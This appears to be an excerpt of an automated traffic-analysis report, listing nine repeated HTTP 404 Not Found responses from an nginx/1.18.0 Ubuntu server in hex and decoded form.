                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:40 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:45 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:32 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:35 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
